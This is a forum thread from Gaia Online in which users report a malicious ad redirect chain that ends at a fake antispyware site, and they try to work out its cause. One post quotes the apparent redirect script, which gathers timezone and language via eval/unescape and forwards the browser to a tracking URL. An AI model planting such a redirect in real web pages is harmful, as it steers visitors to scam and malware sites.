Welcome to Gaia! ::

bratprince. u-n o a
iGODOFTHEGODLESS
I honestly wouldn't try that link on my computer, even if I have a good anti-virus running. rolleyes

littlerilsin
That sounds real nasty. Does that only happen when you're in Gaiaonline?

Yes, and only tonight. It was fine earlier today. I am mostly just annoyed as I can't do ANYTHING efficiently. I can't use the marketplace at all as I can't keep up and would lose the good buys anyways, so I am just trying to make sure that someone hears what is going on, and could maybe help.
I don't even know who could help with this, possibly developers, or coders at the head offices which is why I am a little concerned, as it would suck if I had to wait all weekend to get back to my quest!

Aged Explorer

7,550 Points
  • Hygienic 200
  • Flatterer 200
  • Elocutionist 200
User Image

Funnily enough I think your problem is actually connected with the antivirus malware one.

For some reason when I get redirected to the antispywareliveproscannerv4.com site, it goes VIA jessicasimpsonblog.com as well as another one I haven't managed to grasp right now internetnetworkads.com I believe. I think yours is doing the same but something you have on your computer is stopping it making that last jump to the antispyware site.

User Image
Mea teh Kitty
User Image

Funnily enough I think your problem is actually connected with the antivirus malware one.

For some reason when I get redirected to the antispywareliveproscannerv4.com site, it goes VIA jessicasimpsonblog.com as well as another one I haven't managed to grasp right now internetnetworkads.com I believe. I think yours is doing the same but something you have on your computer is stopping it making that last jump to the antispyware site.

User Image

AH! Thank you! I am going to put a quote of that on my first post in case someone with the power to help does come in, they might see it and think of a solution!
Very very helpful! heart

Aged Explorer

7,550 Points
  • Hygienic 200
  • Flatterer 200
  • Elocutionist 200
That's cool. It's happening to me EVERY time I post right now.
I would rather see a solution to it implemented as quickly as possible.
Keep trying to grasp all the connections it tries to make.

It flashes a few things and then just links one to the other through these three...
internetnetworkads.com
to
jessicasimpsonblog.cn
to
antispywareliveproscannerv4.com

No idea where it originates though. Which is irritating meeeeee.
Internet Geeks get very unhappy with limits and no resources. D:<
Haven't the admin privileges to track it down myself.
So I hope that the Gaia Admins can fix it soon, and that if they need help they can ask.
I'd be happy to do what I can to get rid of this stupid link.
I'm actually on a different account due to the fact that I can't even post or browse any part of gaia without being redirected to the site you're speaking of

it's rather annoying and I am trying to run an art auction that I can't post in, somewhat troublesome I really hope it is fixed soon sad
torturing-the-world
I'm actually on a different account due to the fact that I can't even post or browse any part of gaia without being redirected to the site you're speaking of

it's rather annoying and I am trying to run an art auction that I can't post in, somewhat troublesome I really hope it is fixed soon sad

You're very lucky that another account will work! I have tried 3 and nothing! (wish I could try a different computer.)

I would suggest keeping your mouse on the stop button, hitting it as soon as you can once the reply portion is loaded. Perhaps then you could let your auction thread know what is happening and put it on hiatus for a day or two.

Just had a little "aha" moment. What if someone who had this problem changed their IP? Mine never seems to work when I try it (not too computer savvy I guess!), but you could change it to be from a different region?
Maybe a european IP, or african or something less likely to be targetted?

Aged Explorer

7,550 Points
  • Hygienic 200
  • Flatterer 200
  • Elocutionist 200
littlerilsin
I doubt that would work as most IP address are dynamic anyway (meaning they change every time you connect to the internet)
And we've already established that it's not limited to anyone JUST in the U.S. or Canada. Or in my case Australia.
it just got to this account too, so I'm not that lucky, but i have for the time being informed my auction thread of the problem

User Image

Aged Explorer

7,550 Points
  • Hygienic 200
  • Flatterer 200
  • Elocutionist 200
One part of the problem...

&script type="text/javascript"&
/* <![CDATA[ */
YAHOO.util.Event.addListener(window,'load',function() {
var adFinder = function(el) {
//debugger;
var pattern = /^ad_inject[0-9]?$/;
return (pattern.test(el.id) && window[el.id].length)
}

var replaceAdFrame = function(el) {
/*var parent = el.parentNode,
iframe = parent.removeChild(el)
iframe.src = window[el.id]
parent.appendChild(iframe)*/
el.src = window[el.id]
}

var ads = YAHOO.util.Dom.getElementsBy(adFinder,'iframe','content',replaceAdFrame)
})
/* ]]> */
&/script&

Other part of the problem...
&script&

var n = eval(unescape('new Date()'))
//tz = eval(unescape('(-(n.getTimezoneOffset()/60))'))
var d = new Date()
var tz = (-(d.getTimezoneOffset()/60))
if(eval(unescape('navigator.language'))) lang = (eval(unescape('navigator.language')))
else if(eval(unescape('navigator.browserLanguage'))) lang = (eval(unescape('navigator.browserLanguage')))

location.href = 'scr.php?a='+tz+'&lang='+lang+'&id=508&ref=aHR0cDovL3d3dy5nYWlhb25saW5lLmNvbS9hZHZlcnRpc2UvZG91YmxlY2xpY2sucGhwP3NpemU9bGVhZGVyYm9hcmQmY2FtcGFpZ249bnVsbCZ0PXJpY2gmcz1nYWlhLmNvbW11bml0eSZ6PWZvcnVtcyZhPTI3Jmc9ZiZvPTEyNDkxMDQ2ODU=&target=top';
&/script&

The first part is actually the coding for putting in the ad. It apparently comes from Yahoo (if an admin ever looks at this they can correct me if I'm wrong). The second part is actually the coding on/of the ad itself, telling the browser to redirect us. (OR! It could just be the coding to timestamp each post, I'm not sure now that I've looked at it again.) Far as I can tell anyway.

Sorry for the page stretch too hun. Don't mean to do that but I can't exactly break up the coding.
Mea teh Kitty
littlerilsin
I doubt that would work as most IP address are dynamic anyway (meaning they change every time you connect to the internet)
And we've already established that it's not limited to anyone JUST in the U.S. or Canada. Or in my case Australia.

Well, yes, but my IP always loads as a canadian IP. Sometimes it puts me in montreal, or toronto, but always Eastern Canada....
Sorry, hadn't seen any proof of other locations since nobody had said in here where they were from, it was just a vague idea of "maybe since others aren't getting it it's from my IP" (only thing I could see as "unique"

torturing-the-world, wow that's a lot of trojans....
I remember my mom's old pc had about 1000 error files (geniuses at our internet company told us to turn off our antivirus as it was a firewall blocking us from browsing!!!)
I am not getting to that point at all, I am stopping at a blank page so thankfully my computer is not at risk, but I wish you the best.

Aged Explorer

7,550 Points
  • Hygienic 200
  • Flatterer 200
  • Elocutionist 200
littlerilsin
Mea teh Kitty
littlerilsin

Well, yes, but my IP always loads as a canadian IP. Sometimes it puts me in montreal, or toronto, but always Eastern Canada....
Sorry, hadn't seen any proof of other locations since nobody had said in here where they were from, it was just a vague idea of "maybe since others aren't getting it it's from my IP" (only thing I could see as "unique"

torturing-the-world, wow that's a lot of trojans....
I remember my mom's old pc had about 1000 error files (geniuses at our internet company told us to turn off our antivirus as it was a firewall blocking us from browsing!!!)
I am not getting to that point at all, I am stopping at a blank page so thankfully my computer is not at risk, but I wish you the best.
o_0;; Wow, the people at your ISP seem to be morons. The ones at my ISP actually told me to get AVAST and use FireFox.
Mea teh Kitty
o_0;; Wow, the people at your ISP seem to be morons. The ones at my ISP actually told me to get AVAST and use FireFox.

haha well, in their defense, it was only one tech support guy who said that. (it was the first time we had internet at home, only a few years ago though, how sad is that lol)
And I am not with them new, I moved faaar away from their area of service smile

Shameless Dabbler

Hello, I am an Australian using Ubuntu, I'm getting this redirection too, clears out a windows problem. This is annoying me though.

Aged Explorer

7,550 Points
  • Hygienic 200
  • Flatterer 200
  • Elocutionist 200
littlerilsin
Mea teh Kitty

haha well, in their defense, it was only one tech support guy who said that. (it was the first time we had internet at home, only a few years ago though, how sad is that lol)
And I am not with them new, I moved faaar away from their area of service smile
Aah, well that's a good thing then. My ISP is run by nerds and geeks, and it's terribly awesome.
They have their moments where they have mental blanks, but I'm getting to know most of them by name.
It's funny because if I ring up John, one of the guys I speak to regularaly, he's a shift manager or something...
But yeah, if I talk to him he just gives me the short geeky version of how to fix the problem because he knows I understand.
Everyone else treats me like a moron and starts with the basics, so I'm on the phone for the first 20 mins going "Yup, done that. Done that. Aaaaand Done that too."
Then I'm all like "You're not helping, is John there?"
And I'm on the phone to him for five minutes and it's fixed.
It's awesome.
/bored ramble.
sorry. xD

Quick Reply

Submit
Manage Your Items
Other Stuff
Get GCash
Offers
Get Items
More Items
Where Everyone Hangs Out